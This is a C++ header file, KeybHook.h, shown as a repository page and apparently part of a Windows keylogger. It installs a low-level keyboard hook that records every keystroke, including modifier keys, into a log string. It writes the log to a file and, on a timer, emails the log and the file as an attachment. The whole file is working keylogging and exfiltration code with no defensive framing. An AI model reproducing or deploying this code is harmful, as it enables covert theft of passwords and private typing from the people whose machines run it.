-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathKeybHook.h
126 lines (82 loc) · 2.98 KB
/
KeybHook.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
#ifndef KEYBHOOK_H
#define KEYBHOOK_H
#include <iostream>
#include <fstream>
#include "windows.h"
#include "KeyConstants.h"
#include "Timer.h"
#include "SendMail.h"
std::string keylog = "";
void TimerSendMail ()
{
if (keylog.empty ())
return;
std::string last_file = IO::WriteLog (keylog);
if (last_file.empty ())
{
Helper::WriteAppLog ("File creation was not succesfull. Keylog '" + keylog + "'");
return;
}
int x = Mail::SendMail ("Log [" + last_file + "]",
"Hi :)\nThe file has been attached to this mail :)\nFor testing there is"
" content of the file:\n\n--------------------------\n" + keylog,
IO::GetOurPath (true) + last_file);
if (x != 7)
Helper::WriteAppLog ("Mail was not sent! Error code: " + Helper::ToString (x));
else keylog = "";
}
Timer MailTimer (TimerSendMail, 500 * 60, Timer::Infinite);
HHOOK eHook = NULL;
LRESULT OurKeyboardProc (int nCode, WPARAM wparam, LPARAM lparam)
{
if (nCode < 0)
CallNextHookEx(eHook, nCode, wparam, lparam);
KBDLLHOOKSTRUCT *kbs = (KBDLLHOOKSTRUCT *)lparam;
if (wparam == WM_KEYDOWN || wparam == WM_SYSKEYDOWN)
{
keylog += Keys::KEYS[kbs->vkCode].Name;
if (kbs->vkCode == VK_RETURN)
keylog += '\n';
}
else if (wparam == WM_KEYUP || wparam == WM_SYSKEYUP)
{
DWORD key = kbs->vkCode;
if (key == VK_CONTROL
|| key == VK_LCONTROL
|| key == VK_RCONTROL
|| key == VK_SHIFT
|| key == VK_LSHIFT
|| key == VK_RSHIFT
|| key == VK_MENU
|| key == VK_LMENU
|| key == VK_RMENU
|| key == VK_CAPITAL
|| key == VK_NUMLOCK
|| key == VK_LWIN
|| key == VK_RWIN)
{
string KeyName = Keys::KEYS[kbs->vkCode].Name;
KeyName.insert (1, "/");
keylog += KeyName;
}
}
return CallNextHookEx(eHook, nCode, wparam, lparam);
}
bool InstalHook ()
{
Helper::WriteAppLog ("Hook started... Timer started");
MailTimer.Start (true);
eHook = SetWindowsHookEx (WH_KEYBOARD_LL, (HOOKPROC)OurKeyboardProc, GetModuleHandle (NULL), 0);
return eHook == NULL;
}
bool UninstalHook ()
{
BOOL b = UnhookWindowsHookEx (eHook);
eHook = NULL;
return (bool)b;
}
bool IsHooked ()
{
return (bool)(eHook == NULL);
}
#endif